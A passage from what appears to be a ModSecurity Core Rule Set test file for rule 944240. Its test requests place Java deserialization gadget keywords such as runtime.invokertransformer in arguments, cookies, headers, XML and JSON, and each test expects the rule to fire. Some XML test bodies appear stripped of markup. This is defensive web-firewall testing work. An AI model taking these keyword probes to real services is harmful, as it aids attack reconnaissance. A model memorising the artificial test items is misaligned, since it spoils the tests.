stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.clonetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-5 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-6 desc: "XML element value includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.clonetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-7 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.clonetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-8 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.clonetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-9 desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.clonetransformer\"}" output: log_contains: "id \"944240\"" - test_title: 944240-10 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.clonetransformer\": 
\"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-11 desc: "Argument test includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.forclosure" output: log_contains: "id \"944240\"" - test_title: 944240-12 desc: "Argument name includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.forclosure=test" output: log_contains: "id \"944240\"" - test_title: 944240-13 desc: "Cookie test includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.forclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-14 desc: "Cookie name includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: 
"ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.forclosure=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-15 desc: "Request header test includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.forclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-16 desc: "XML attribute value includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-17 desc: "XML element value includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" 
Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.forclosure" output: log_contains: "id \"944240\"" - test_title: 944240-18 desc: "Nested XML element value includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.forclosure" output: log_contains: "id \"944240\"" - test_title: 944240-19 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.forclosure" output: log_contains: "id \"944240\"" - test_title: 944240-20 desc: "Content-Type application/json arg value includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.forclosure\"}" output: log_contains: "id \"944240\"" - test_title: 944240-21 desc: "Content-Type application/json arg name includes keyword 
runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.forclosure\": \"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-22 desc: "Argument test includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.instantiatefactory" output: log_contains: "id \"944240\"" - test_title: 944240-23 desc: "Argument name includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.instantiatefactory=test" output: log_contains: "id \"944240\"" - test_title: 944240-24 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.instantiatefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-25 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.instantiatefactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-26 desc: "Request header test includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.instantiatefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-27 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-28 desc: "XML element value includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.instantiatefactory" output: log_contains: "id \"944240\"" - test_title: 944240-29 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.instantiatefactory" output: log_contains: "id \"944240\"" - test_title: 944240-30 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.instantiatefactory" output: log_contains: "id \"944240\"" - test_title: 
944240-31 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.instantiatefactory\"}" output: log_contains: "id \"944240\"" - test_title: 944240-32 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.instantiatefactory\": \"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-33 desc: "Argument test includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.instantiatetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-34 desc: "Argument name includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: 
# Continuation of test 944240-34, which opens before this span; the first scalar below is its Host header value.
                'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'runtime.instantiatetransformer=test'
          output:
            log_contains: 'id "944240"'
  # Keyword runtime.instantiatetransformer, remaining request locations
  # (cookie value/name, header, XML, text/plain, JSON). Every case is a
  # positive test: it expects rule id 944240 in the log.
  - test_title: '944240-35'
    desc: 'Cookie test includes keyword runtime.instantiatetransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'test=runtime.instantiatetransformer'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-36'
    desc: 'Cookie name includes keyword runtime.instantiatetransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'runtime.instantiatetransformer=test'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-37'
    desc: 'Request header test includes keyword runtime.instantiatetransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              test: 'runtime.instantiatetransformer'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-38'
    desc: 'XML attribute value includes keyword runtime.instantiatetransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): no XML markup or keyword visible in this body; presumably stripped - confirm upstream.
            data: 'element_value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-39'
    desc: 'XML element value includes keyword runtime.instantiatetransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.instantiatetransformer'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-40'
    desc: 'Nested XML element value includes keyword runtime.instantiatetransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.instantiatetransformer'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-41'
    desc: 'Content-Type text/plain includes keyword runtime.instantiatetransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'text/plain'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=runtime.instantiatetransformer'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-42'
    desc: 'Content-Type application/json arg value includes keyword runtime.instantiatetransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/json'
            method: 'POST'
            version: 'HTTP/1.0'
            data: '{"test": "runtime.instantiatetransformer"}'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-43'
    desc: 'Content-Type application/json arg name includes keyword runtime.instantiatetransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/json'
            method: 'POST'
            version: 'HTTP/1.0'
            data: '{"runtime.instantiatetransformer": "test"}'
          output:
            log_contains: 'id "944240"'
  # Keyword runtime.invokertransformer: the same request locations again,
  # starting with argument value and argument name.
  - test_title: '944240-44'
    desc: 'Argument test includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=runtime.invokertransformer'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-45'
    desc: 'Argument name includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'runtime.invokertransformer=test'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-46'
    desc: 'Cookie test includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'test=runtime.invokertransformer'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  # Test 944240-47 opens here; its remaining headers follow on the next line of the page.
  - test_title: '944240-47'
    desc: 'Cookie name includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
# Continuation of test 944240-47 (cookie name carries the keyword): remaining headers, body and expected log entry.
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'runtime.invokertransformer=test'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  # Keyword runtime.invokertransformer in a request header, in XML bodies,
  # in text/plain and in JSON. Each case expects rule id 944240 in the log.
  - test_title: '944240-48'
    desc: 'Request header test includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              test: 'runtime.invokertransformer'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-49'
    desc: 'XML attribute value includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
